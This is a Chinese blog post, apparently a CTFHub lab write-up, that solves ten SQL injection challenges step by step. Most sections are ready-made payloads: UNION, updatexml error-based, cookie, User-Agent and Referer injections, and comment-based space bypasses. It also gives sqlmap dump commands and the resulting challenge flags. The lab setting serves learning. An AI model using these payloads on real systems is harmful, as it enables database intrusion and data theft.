CTFHub技能树 Web-SQL注入详解
创始人
2024-02-28 16:38:53

文章目录

    • 0x01 整数型注入
    • 0x02 字符型注入
    • 0x03 报错注入
    • 0x04 布尔盲注
    • 0x05 时间盲注
    • 0x06 MySql结构
    • 0x07 Cookie注入
    • 0x08 空格绕过
    • 0x09 UA注入
    • 0x10 Refer注入
    • 总结
    • 摘抄

在这里插入图片描述

0x01 整数型注入

在这里插入图片描述

解题WP
第一步 尝试闭合点
在这里插入图片描述
在这里插入图片描述

第二步 判断列数

id=1 order by 2 页面正常
id=1 order by 3 页面未回显数据

在这里插入图片描述
在这里插入图片描述

第三步 联合查询,判断回显位置
/?id=-1 union select 1,2

在这里插入图片描述

第四步 执行数据库语句
-1 union select 1,database()
在这里插入图片描述

第五步 查询当前数据库下的表名
id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
在这里插入图片描述

第六步 查询表下的字段
?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'
在这里插入图片描述

第七步 输入字段值
?id=-1 union select 1,flag from sqli.flag

在这里插入图片描述

0x02 字符型注入

在这里插入图片描述

解题WP
第一步 闭合方式
/?id=1' --+'
在这里插入图片描述

第二步 查看回显字段的位数

id=1' order by 2 --+' 页面正常
id=1' order by 3 --+' 页面未回显数据

在这里插入图片描述

第三步 判断回显的位置
-1' union select 1,2 --+'
在这里插入图片描述

sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 --dbs
在这里插入图片描述

sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

在这里插入图片描述

sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns
在这里插入图片描述

sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

在这里插入图片描述

0x03 报错注入

在这里插入图片描述

第一步 判断注入

id=1页面回显正常
id=1'发现页面报错,回显数据库错误信息

在这里插入图片描述
在这里插入图片描述

第二步 使用updatexml注入,数据库名称

 updatexml(xml_document,xpath_string,new_value)
第一个参数:xml_document,为xml文档对象名称,是数据库x库的doc字段
第二个参数:xpath_string:xpath语法
第三个参数:new_value:替换查找到的符合条件的字符(string)/?id=1 and updatexml(1,concat(0x5e,database()),1)

在这里插入图片描述

第三步 获取表名
编解码在线工具
https://www.toolhelper.cn/

/?id=1 and updatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schema=0x73716c69),0x5e),1)

在这里插入图片描述

第四步 获取字段

/?id=1 and updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167),0x5e),1)

在这里插入图片描述

第五步 获取字段值

/?id=1 and updatexml(1,concat(0x5e,(select flag from sqli.flag),0x5e),1)
发先flag少了一部分
mid 就可以得到flag后面的一部分
/?id=1 and updatexml(1,concat(0x5e,mid((select flag from sqli.flag),32),0x5e),1)

在这里插入图片描述
在这里插入图片描述

0x04 布尔盲注

在这里插入图片描述

--dbs 
-D sqli --tables 
-D sqli -T flag columns --dump

在这里插入图片描述

sqlmap -u "http://challenge-70a9e8b793dd9d2b.sandbox.ctfhub.com:10800/?id=1" --dbs

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

sqlmap -u "http://url/?id=1" -D sqli --tables --batch
在这里插入图片描述

sqlmap -u "http://url/?id=1" -D sqli -T flag --columns --batch
在这里插入图片描述

 sqlmap  -u "http://url/?id=1" -D sqli -T flag -C flag --dump --batch 
ctfhub{c04dd02440c0191e73caad9c}

在这里插入图片描述

0x05 时间盲注

--dbs 
-D sqli --tables 
-D sqli -T flag --columns 
-D sqli -T flag -C flag --dump
--batch 

在这里插入图片描述
在这里插入图片描述

0x06 MySql结构

在这里插入图片描述

--dbs 
-D sqli --tables 
-D sqli -T whvvzxswne columns --dump
sqlmap -u http://url/?id=1  -D sqli -T  qtcwgcmzbh   -C  jkcwouoqak   --dump  --batch 
ctfhub{f37e47264f12f73fe5129649} 

在这里插入图片描述

0x07 Cookie注入

在这里插入图片描述

第一步 确定闭合

Cookie: id=1  数字型注入

在这里插入图片描述

第二步 查看回显字段的位数

Cookie: id=1 order by 2; 页面正常
Cookie: id=1 order by 3; 页面异常

在这里插入图片描述
在这里插入图片描述

第三步 使用union查询,查看回显位置

Cookie: id=-1 union select 1,2;

在这里插入图片描述

第四步 查看当前数据库

Cookie: id=-1 union select 1,database();

在这里插入图片描述

第五步 查看表名

Cookie: id=-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1);
trxfffaswl
news

在这里插入图片描述
在这里插入图片描述

第六步 查询字段

Cookie: id=-1 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='trxfffaswl' limit 0,1);
brdjzysggi

在这里插入图片描述

第七步 查看字段值

Cookie: id=-1 union select 1,(select brdjzysggi from trxfffaswl limit 0,1);

在这里插入图片描述

0x08 空格绕过

在这里插入图片描述

第一步 确定闭合
?id=1/**/or/**/1=1 //测试or,and等特殊字符是否被过滤

第二步 查看回显字段的位数

?id=1/**/order/**/by/**/2;页面正常
?id=1/**/order/**/by/**/3; 页面异常

在这里插入图片描述
在这里插入图片描述

第三步 使用union查询,查看回显位置

?id=-1/**/union/**/select/**/1,2

在这里插入图片描述

第四步 查看当前数据库

-1/**/union/**/select/**/1,database()

在这里插入图片描述

第五步 查看表名

表明1
?id=-1/**/union/**/select/**/1,(select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'/**/limit/**/0,1)
表名2
?id=-1/**/union/**/select/**/1,(select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'/**/limit/**/1,1)
ID: imrqzusgig
Data: news

在这里插入图片描述

第六步 查询字段

?id=-1/**/union/**/select/**/1,(select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='imrqzusgig'/**/limit/**/0,1)
Data: sxiiqtwdft

在这里插入图片描述

第七步 查看字段值

?id=-1/**/union/**/select/**/1,(select/**/sxiiqtwdft/**/from/**/imrqzusgig/**/limit/**/0,1)

0x09 UA注入

在这里插入图片描述

第一步 构造闭合

1 or 1=2 页面回显正常
1 and 1=2

在这里插入图片描述
在这里插入图片描述

第二步 查询列数量

1 order by 1,2,3  页面报错
1 order by 1,2  页面正常

在这里插入图片描述
在这里插入图片描述

第三步 判断回显,查询数据库

-1 union select 1,2 
-1 union select 1,database()

在这里插入图片描述
在这里插入图片描述

第四步 查看表名称

-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)
cutmmwbdxt
news

在这里插入图片描述

第五步 查看字段名称

-1 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='cutmmwbdxt' limit 0,1)
iezonoaoey 

在这里插入图片描述

第六步 查看字段值

-1 union select 1,(select iezonoaoey   from cutmmwbdxt limit 0,1)
ctfhub{509b5eecd5afe7a69925baad}

在这里插入图片描述

0x10 Refer注入

在这里插入图片描述

第一步 构造闭合

1 or 1=2 页面回显正常
1 and 1=2

在这里插入图片描述
在这里插入图片描述

第二步 查询列数量

1 order by 1,2,3  页面报错
1 order by 1,2  页面正常

在这里插入图片描述
在这里插入图片描述

第三步 判断回显,查询数据库

-1 union select 1,2 
-1 union select 1,database()

在这里插入图片描述

在这里插入图片描述

第四步 查看表名称

-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)
skwdbewppe
news

在这里插入图片描述

第五步 查看字段名称

-1 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='skwdbewppe' limit 0,1)
lmdptzbbsz

在这里插入图片描述

第六步 查看字段值

-1 union select 1,(select lmdptzbbsz  from skwdbewppe limit 0,1)
ctfhub{696d71da4c29a525eb09512d}

在这里插入图片描述

所有的SQL注入完成
在这里插入图片描述

总结

level有5级,越高检测越全,默认为 1

--level 1 检测Get和Post--level 2 检测HTTP Cookie--level 3 检测User-Agent和Referer--level 4 检测--level 5 检测 HOST 头

risk有3级,级别越高风险越大,默认为1

--risk 2 会在默认的检测上添加大量时间型盲注语句测试--risk 3 会在原基础上添加OR 类型的布尔型盲注 ,可能会update导致修改数据库

摘抄


如果你有一堆苹果,有好有坏,你应该先吃好的,把烂的扔掉。如果你先吃坏的,好的也会变坏,你就永远吃不到好的,这就是苹果定律。
苹果定律告诉我们,人必须善于取舍,要记住先做你生命中最重要的事。
仔细想想,人生曾有多少次机遇被我们错过,有多少重要的事被我们割舍。每个阶段都有不同的目标,找到当下最核心最重要的事,是一个人最大的本事和能力。
  ---《苹果定律》


相关内容

热门资讯

埃菲尔铁塔在哪 中国仿建埃菲尔... 2019年4月26日,广西南宁市,街头惊现一座巨型山寨版埃菲尔铁塔,高约20米,白色塔身,造型逼真,...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
应用未安装解决办法 平板应用未... ---IT小技术,每天Get一个小技能!一、前言描述苹果IPad2居然不能安装怎么办?与此IPad不...
脚上的穴位图 脚面经络图对应的... 人体穴位作用图解大全更清晰直观的标注了各个人体穴位的作用,包括头部穴位图、胸部穴位图、背部穴位图、胳...
长白山自助游攻略 吉林长白山游... 昨天介绍了西坡的景点详细请看链接:一个人的旅行,据说能看到长白山天池全凭运气,您的运气如何?今日介绍...
demo什么意思 demo版本... 618快到了,各位的小金库大概也在准备开闸放水了吧。没有小金库的,也该向老婆撒娇卖萌服个软了,一切只...
猫咪吃了塑料袋怎么办 猫咪误食... 你知道吗?塑料袋放久了会长猫哦!要说猫咪对塑料袋的喜爱程度完完全全可以媲美纸箱家里只要一有塑料袋的响...
世界上最漂亮的人 世界上最漂亮... 此前在某网上,选出了全球265万颜值姣好的女性。从这些数量庞大的女性群体中,人们投票选出了心目中最美...
埃菲尔铁塔在哪 中国仿建埃菲尔... 2019年4月26日,广西南宁市,街头惊现一座巨型山寨版埃菲尔铁塔,高约20米,白色塔身,造型逼真,...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
应用未安装解决办法 平板应用未... ---IT小技术,每天Get一个小技能!一、前言描述苹果IPad2居然不能安装怎么办?与此IPad不...